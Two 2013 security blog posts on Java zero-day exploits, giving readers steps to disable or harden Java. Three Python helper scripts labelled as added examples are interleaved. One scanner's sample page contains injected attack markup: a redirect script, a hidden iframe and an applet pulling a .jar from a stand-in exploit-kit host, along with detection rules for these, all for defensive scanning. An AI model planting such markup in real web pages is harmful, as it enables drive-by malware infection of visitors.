January 17, 2013

Hello, another Java 0-day exploit has been revealed!


It was 5 days and a few hours ago that I published a blog article about a recent Java vulnerability being exploited in the wild. In it I advised my readers to disable Java plug-ins from running in their browsers, or to uninstall Java altogether.

Then, three days later, on Jan 14, 2013, Oracle, the keeper and maintainer of the Java code, released an out-of-band patch to plug the vulnerability that was the cause of the exploits. This was done with the release of Java 7 update 11.

However, on Wednesday, Jan 16, 2013, Trend Micro researchers posted findings that revealed that the Oracle patch was incomplete and left a related attack vector open. A few hours later, a high-ranking admin on a malware distribution forum offered to sell a working exploit for this new zero-day vulnerability, with a starting bid of $5,000 USD (see Brian Krebs' article), to two more individuals (he had already sold one copy). Within a short time his offer was taken down, leading Brian Krebs to postulate that the bidding had ended and all three copies of the hardened, ready-to-go exploit had been sold.

I know that there are some business programs and commercial web pages that operate with Java Applets, requiring users to have Java enabled in their browsers and/or operating systems. These people cannot simply uninstall Java. They want a workable method of keeping Java while reducing their exposure to malware sneak attacks. Let's see if I can help a little.

First of all, Java can be uninstalled easily from most Windows computers, via the (Add/Remove) Programs (and Features) applet in the Windows Control Panel. All properly installed versions of Java will be listed in the list of installed programs which can be uninstalled, via a button press.

But, if you must keep Java on your computer, to use a mandatory program or website, here are some practical methods you can use to limit your risk of malware infection via Java. They are listed in what I consider to be the most easily deployed order.

  1. Go to Control Panel (Windows), find the Java icon, open it, update to the current version, then reboot.
  2. The newest version has a security level slider and a checkbox to disable Java plug-ins from your browsers. Set the security slider to the high or highest setting. Close and re-open your browser to get this to take effect.
  3. If you only need Java for a desktop or network application, not a website, uncheck the checkbox labeled: "Enable Java content in the browser" then apply the change.
  4. Browse with the most current version of Firefox. Firefox now disables Java applets by default and asks you if you wish to allow them to run when Java Applets are encountered on a web page.
  5. Every Java exploit kit I have encountered relies upon JavaScript functions to load the appropriate malware Applet .jar file to exploit your PC. For better protection, install the NoScript Add-on for Firefox and allow it to use the default settings (which you must read about before using it). NoScript blocks both Java and JavaScript by default, unless you explicitly allow them to run. If your browser does not receive the redirection commands, or exploit detection functions, nothing happens automatically. In that case, watch out for prompts to manually install a malicious Java Applet!
  6. Many zero-day exploits, as well as nth-day exploits, assume that the user is logged in with administrator privileges, or with UAC prompts disabled. This enables silent, drive-by exploits to install malware into the operating system with no user interaction. Watch the video on the Malwarebytes' blog to see such an exploit in action.
  7. In view of how malware exploits use administrator level privileges to do their dirty work, consider lowering your privileges for the computer account you normally use to browse the Internet and run productivity applications. Read these articles for more details: (1) (2) (3)
  8. I can't tell you what malware protection to use, but I sure as my name's Wiz can recommend some that I use. I use a 4-fold approach to secure my PCs: (1): I operate with reduced user privileges; (2): I run Malwarebytes' Anti-Malware; (3): I run the current version of Trend Micro Internet Security; (4): I browse with the current version of Firefox, with the NoScript Add-On installed and enabled.
  9. Despite all of the above protections there is one more exploit vector: The weak link that exists between the chair and the keyboard. Use common sense while browsing the 'net. Unexpected alert boxes, pop-up scans and web page redirects are not business as usual. If something seems wrong, assume that it is and back out and close your browser, then scan for malware in the browser cache or temporary Internet files. Don't blindly allow programs to run or install just because a pop-up tells you to, especially if it is an "unsigned" or "Self-signed" program.
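Steps 2 and 3 above are clicked through in the Java Control Panel, but the two settings they change land in the user's deployment.properties file, which makes them easy to audit across several machines. The following script is an added example, not code from the original post or from Oracle. It assumes that the security slider is stored as `deployment.security.level` (values LOW, MEDIUM, HIGH, VERY_HIGH) and the "Enable Java content in the browser" checkbox as `deployment.webjava.enabled`, as in Java 7 Update 10 and later; the sample file contents are constructed for the example, not copied from a real machine.

```python
"""Audit and harden a Java deployment.properties file against steps 2 and 3.

Added example, not code from the original post. Assumed property names:
deployment.security.level (the slider) and deployment.webjava.enabled (the
"Enable Java content in the browser" checkbox). SAMPLE_PROPERTIES is a
constructed file, not taken from a real installation.
"""
import re

# Constructed sample: installer defaults with the slider at MEDIUM and the
# browser plug-in still enabled.
SAMPLE_PROPERTIES = """\
#deployment.properties
#Thu Jan 17 10:00:00 EST 2013
deployment.version=7.11
deployment.security.level=MEDIUM
deployment.webjava.enabled=true
deployment.javaws.viewer.bounds=0,0,800,600
"""

LEVEL_KEY = "deployment.security.level"
WEBJAVA_KEY = "deployment.webjava.enabled"
SAFE_LEVELS = ("HIGH", "VERY_HIGH")   # the slider's "high" and "highest" (assumed names)

# key, then '=' or ':' or whitespace, then value: the .properties grammar, simplified
KV_RE = re.compile(r"^\s*([^=:\s#!][^=:\s]*)\s*(?:[=:]|\s)\s*(.*?)\s*$")


def split_line(line):
    """Return (key, value) for a property line, or None for blanks and comments."""
    m = KV_RE.match(line)
    return (m.group(1), m.group(2)) if m else None


def parse_properties(text):
    """Parse .properties text into a dict; a later duplicate key wins, as in Java."""
    props = {}
    for line in text.splitlines():
        kv = split_line(line)
        if kv:
            props[kv[0]] = kv[1]
    return props


def audit(props, browser_needed=False):
    """List what still violates steps 2 and 3; an empty list means the file passes."""
    findings = []
    level = props.get(LEVEL_KEY, "").upper()
    if level not in SAFE_LEVELS:
        findings.append(f"step 2: security level is {level or 'unset'}, want HIGH or VERY_HIGH")
    # An absent key means the installer default, which leaves the plug-in enabled.
    if not browser_needed and props.get(WEBJAVA_KEY, "true").lower() != "false":
        findings.append("step 3: Java content in the browser is enabled")
    return findings


def harden(text, browser_needed=False):
    """Rewrite the file text so audit() passes, keeping every other line in place."""
    current = parse_properties(text)
    level = current.get(LEVEL_KEY, "").upper()
    wanted = {
        # keep HIGH if the user already chose it; otherwise go to the top of the slider
        LEVEL_KEY: level if level in SAFE_LEVELS else "VERY_HIGH",
        WEBJAVA_KEY: "true" if browser_needed else "false",
    }
    out, seen = [], set()
    for line in text.splitlines():
        kv = split_line(line)
        if kv and kv[0] in wanted:
            out.append(f"{kv[0]}={wanted[kv[0]]}")
            seen.add(kv[0])
        else:
            out.append(line)
    # keys the file never had are appended so the setting is explicit
    out.extend(f"{k}={v}" for k, v in wanted.items() if k not in seen)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for finding in audit(parse_properties(SAMPLE_PROPERTIES)):
        print("FAIL", finding)
    print(harden(SAMPLE_PROPERTIES))
```

Run against the constructed sample, the audit reports both steps as failing; the hardened output keeps the comments and unrelated keys untouched and only forces the two settings. Pass `browser_needed=True` for the users described above who must keep Applets working in a browser; they still get the slider raised.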

I hope this helps keep you safe from Java exploits. Doing the things I suggest will not just block the current zero-day exploits, but those to come.



January 11, 2013

Java is the most exploited browser plug-in. Disable it if not needed!


Once again, Oracle's Java software is making security news for being exploited in most major exploit kits via a new zero-day vulnerability. A zero-day vulnerability is one where a proof-of-concept exploit is disclosed before the software vendor has a chance to create a patch to block that attack vector. At this time, Oracle has not released a patched version of Java and there is no known workaround. The next regularly scheduled Java update is set for February 19, 2013.

UPDATE January 14, 2013

Oracle has just released a sudden out-of-band patch for the new vulnerability in its Java Virtual Machine. The patch is called Java 7 update 11, available here.

The most dangerous and exploited type of Java is the kind that is used as a "plug-in" for web browsers (Internet Explorer, Google Chrome, Firefox, Safari, Opera, etc.). You see, when you install Java on your computer or hand-held devices, it installs both as an executable package that can be used by desktop productivity and entertainment applications, and as a plug-in for each brand of web browser you have installed on that device. The browser plug-in is responsible for running Java Applets in your browser. These Applets are supposed to be contained within a programmed-in software boundary called a "sandbox" - but they are notorious for being exploited to jump out of the sandbox and into the operating system.

I should point out that Java has been one of the favorite targets of virus and malware exploit authors since the year 1998 (Strange Brew - first Java virus). Over the years Java has been deployed in more and more devices, to the point that Oracle, the current owner, claims that Java is installed on over 3 billion devices Worldwide. Chances seem reasonable that you are using one or more of those 3 billion devices.

Since Java itself can be installed and run on devices that are based on different operating systems, it can be used to download malware to any of those devices by simply detecting the operating system and downloading the appropriate binary program for exploiting it. The typical entry point for exploitation is a web browser. The method by which the browser is caused to run malicious code can be clicking on obfuscated poisoned links in email scams, hidden "iframes" that draw the attack code into otherwise legitimate websites (and your browser), or JavaScript redirects that were injected into the head or end sections of compromised web pages.
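A webmaster who suspects a site has been compromised can look for the three injection patterns just described directly in the saved HTML. The scanner below is an added example, not code from the original post; the page it scans is constructed for the example, and 192.0.2.10 is a documentation address standing in for an exploit-kit server. The heuristics (an iframe sized 0 or 1 pixel or styled invisible, an applet or object pulling a .jar, a script block that rewrites `location`) are assumptions about what typical injections look like, so treat hits as leads for manual review rather than proof.

```python
"""Flag hidden iframes, .jar Applets and redirecting scripts in saved HTML.

Added example, not from the original post. The sample page is constructed;
the detection rules are heuristics chosen for this example.
"""
import re
from html.parser import HTMLParser

# Constructed page: a legitimate shop page with three injected elements.
CONSTRUCTED_PAGE = """<html><head><title>Shop</title>
<script>var q = 1;</script>
<script>document.location.replace("http://192.0.2.10/kit/in.php");</script>
</head><body>
<h1>Welcome</h1>
<iframe src="http://192.0.2.10/kit/index.php" width="1" height="1" style="visibility:hidden"></iframe>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<applet code="Main.class" archive="http://192.0.2.10/kit/app.jar" width="1" height="1"></applet>
</body></html>
"""

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
REDIRECT_JS = re.compile(r"\blocation(?:\.href)?\s*=|\blocation\.(?:replace|assign)\s*\(", re.I)


class InjectionScanner(HTMLParser):
    """Collects (kind, detail) findings while the parser walks the document."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._in_head = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "head":
            self._in_head = True
        elif tag == "script":
            self._in_script = True
        elif tag == "iframe":
            # a 0 or 1 pixel frame, or one styled invisible, has no legitimate reason to exist
            tiny = a.get("width", "").strip() in ("0", "1") or a.get("height", "").strip() in ("0", "1")
            if tiny or HIDDEN_STYLE.search(a.get("style", "")):
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag in ("applet", "object", "embed"):
            # Java Applet delivery: an archive attribute, a .jar reference, or a java MIME type
            jar = next((v for v in a.values() if v.lower().endswith(".jar")), None)
            if jar or "archive" in a or "java" in a.get("type", "").lower():
                self.findings.append(("java-applet", jar or a.get("code", "")))

    def handle_endtag(self, tag):
        if tag == "head":
            self._in_head = False
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # script bodies arrive here in one piece; flag ones that move the browser elsewhere
        if self._in_script and REDIRECT_JS.search(data):
            where = "head" if self._in_head else "body"
            self.findings.append(("script-redirect", f"{where}: {data.strip()[:60]}"))


def scan(html):
    """Return the list of (kind, detail) findings for one HTML document."""
    parser = InjectionScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for kind, detail in scan(CONSTRUCTED_PAGE):
        print(f"{kind:16} {detail}")
```

On the constructed page the scanner reports exactly the three injected elements and leaves the ordinary YouTube embed alone. For a real site, run it over every saved page and compare results against a known-clean copy from backup, since injected code is usually appended to many files at once.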

Java is exploited constantly, for both old and new versions and vulnerabilities, for at least three reasons: (1) It is found on 3 billion devices; (2) most people don't even know if they have Java installed on whatever devices they are using to connect to the Internet; (3) Oracle is very slow to patch Java vulnerabilities that they are notified about.

What you can do to protect your devices from Java exploits

You can take the following steps to protect your computers, or hand-held devices from Java exploits.

  1. Disable Java plug-ins from running in all installed web browsers
  2. Find out what version, if any, of Java is installed and active
  3. Uninstall any non-current versions of Java
  4. Install only the most current version of Java for your operating system
  5. Uninstall Java altogether! (Windows | Mac | Linux)
  6. Operate your computer with reduced user privileges (not as an Administrator) (1) (2) (3)
  7. Use only legally obtained operating systems and keep up with updates and patches
  8. Regularly check for and apply updates for all third party browser add-ons and plug-ins (not just Java)
  9. Defend against exploit kits by disabling JavaScript (and Java) by default, unless you specifically want to allow scripting to run. Do this by installing the NoScript add-on to Firefox, or the ScriptNo extension for Google Chrome. Internet Explorer users are and probably will always remain vulnerable to scripting attacks, unless you disable "Active Scripting" altogether. ;-(
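Steps 2 to 4 above amount to an inventory question: of the Java copies on a machine, which one is newest, is it at least the patched release, and which older copies should go? The script below is an added example, not code from the original post. It understands two spellings of a Java version, the banner printed by `java -version` ("1.7.0_10") and the name shown in Add/Remove Programs ("Java 7 Update 10"), and uses Java 7 Update 11, the out-of-band patch named in the update above, as the baseline; the inventory it runs on is constructed.

```python
"""Sort installed Java copies into keep / uninstall / needs-update (steps 2 to 4).

Added example, not from the original post. PATCHED is the release the post
names as fixed; CONSTRUCTED_INVENTORY is made up for the example.
"""
import re
from typing import NamedTuple, Optional

PATCHED = (7, 11)   # Java 7 Update 11; raise this when a newer fix ships

# `java -version` banner, e.g. java version "1.7.0_10"
BANNER_RE = re.compile(r'java version "1\.(\d+)\.\d+(?:_(\d+))?')
# Add/Remove Programs entry, e.g. Java(TM) 6 Update 38 or Java 7 Update 11
PROGRAM_RE = re.compile(r"\bJava(?:\(TM\))?\s+(\d+)\s+Update\s+(\d+)", re.I)

# Constructed inventory: two Java 7 copies, a stray Java 6, and a non-Java program.
CONSTRUCTED_INVENTORY = [
    'java version "1.7.0_10"\nJava(TM) SE Runtime Environment (build 1.7.0_10-b18)',
    "Java(TM) 6 Update 38",
    "Java 7 Update 11",
    "Mozilla Firefox 18.0",
]


class JavaVersion(NamedTuple):
    family: int    # 6, 7, ...
    update: int    # the "Update N" / "_N" part
    label: str     # the text it was parsed from

    def key(self):
        """Ordering key: family first, then update number."""
        return (self.family, self.update)


def parse_version(text: str) -> Optional[JavaVersion]:
    """Parse one inventory entry; returns None for anything that is not Java."""
    m = BANNER_RE.search(text) or PROGRAM_RE.search(text)
    if not m:
        return None
    return JavaVersion(int(m.group(1)), int(m.group(2) or 0), text.strip().splitlines()[0])


def assess(entries):
    """Classify an inventory into what to keep, what to uninstall, and whether
    the surviving copy itself still needs updating to the patched release."""
    versions = [v for v in (parse_version(e) for e in entries) if v]
    if not versions:
        return {"keep": [], "uninstall": [], "update_needed": False}
    newest = max(versions, key=JavaVersion.key)
    return {
        "keep": [newest],
        # step 3: every older copy goes, including a parallel Java 6 install
        "uninstall": [v for v in versions if v is not newest],
        # step 4: the survivor must be at least the patched release
        "update_needed": newest.key() < PATCHED,
    }


if __name__ == "__main__":
    result = assess(CONSTRUCTED_INVENTORY)
    for v in result["keep"]:
        print("keep     ", v.label)
    for v in result["uninstall"]:
        print("uninstall", v.label)
    print("update needed:", result["update_needed"])
```

Feed it the lines from your own Programs list (or the `java -version` output of each installed JRE) and it answers all three questions at once; a Java 6 entry is always an uninstall candidate because a newer family is current.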

The purpose of exploit kits is to compromise as many computing devices as possible for the following nefarious purposes:

  1. To install spamming malware
  2. To turn your device into an attack zombie in a DDoS botnet
  3. To make your computer available as a web proxy for criminals to hide behind as they carry on criminal activities and scams
  4. To silently install keylogging and/or bank account monitoring malware Trojans, to steal funds from your financial accounts
  5. To use keyloggers to steal login credentials to your website control panels, Facebook, Twitter, LinkedIn, MySpace, eBay etc.
  6. To install Trojans that search for particularly desirable and sensitive documents and upload copies to spies abroad
  7. Some will download rogue security software that presents alarming fake virus scans of your computer, demanding money to remove the perceived non-existent threats
  8. Currently, a lot of exploit kits download what is commonly called "Police Ransomware" to your computer, locking you out of using it unless you pay a fine (ransom). DO NOT PAY THE FINE! Have the PC disinfected by a professional.
  9. If you work in government, defense, a public utility, nuclear energy or the financial industry, custom-written exploit kits might be used in "spear phishing" email attacks to deliver real spyware to your PC and even the entire network. Company, very high level or secret documents can be stolen by Trojans written for this purpose.
  10. Above all of these things, all exploit kits install a "backdoor" into the infected computer or device. This allows the cybercriminals running the exploit to visit your computer any time they wish, download other malware to it, or use it to do illegal things (e.g. transfer stolen funds from bank accounts), leading to your IP address, then to your name and address if the Police become involved.

If you know or even think that you may have clicked on a link leading to an exploit kit, you need to scan for malware now. You can use the free online Housecall scanner from Trend Micro, or the stand-alone Microsoft Safety Scanner. If you have no security program installed, or one that is outdated or has expired, you can download a trial version of Trend Micro Internet Security (or Anti-Virus+). It is fully activated for a month and will remove most malware it detects. It also blocks access to malicious web pages, protecting you from exploit kits.

About the author

Wiz's Blog is written by Bob "Wiz" Feinberg, an experienced freelance computer consultant, troubleshooter and webmaster. Wiz's specialty is in computer and website security. Wizcrafts Computer Services was established in 1996.

I produce this blog and website at my own expense. If you find this information valuable please consider making a donation via PayPal.

Follow @Wizcrafts on Twitter, where I post short updates on security issues, spam trends and things that just eat at my craw.

Follow Wizcrafts on Twitter


Malwarebytes' Anti-Malware is the most frequently recommended malware removal tool in malware removal forums, like Bleeping Computers. It is extremely effective for removing fake/rogue security alerts, Bots, Spyware and the most prevalent and current malware threats in the wild. Learn about Malwarebytes Anti-Malware.


MailWasher Pro is an effective spam filter that protects your desktop email client. Using a combination of blacklists and built-in and user configurable filters, MailWasher Pro recognizes and deletes spam before you download it. MailWasher Pro reveals the actual URL of any links in a message, which protects you from most Phishing scams. Try it free for 30 days.





This weblog is licensed under a Creative Commons License.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.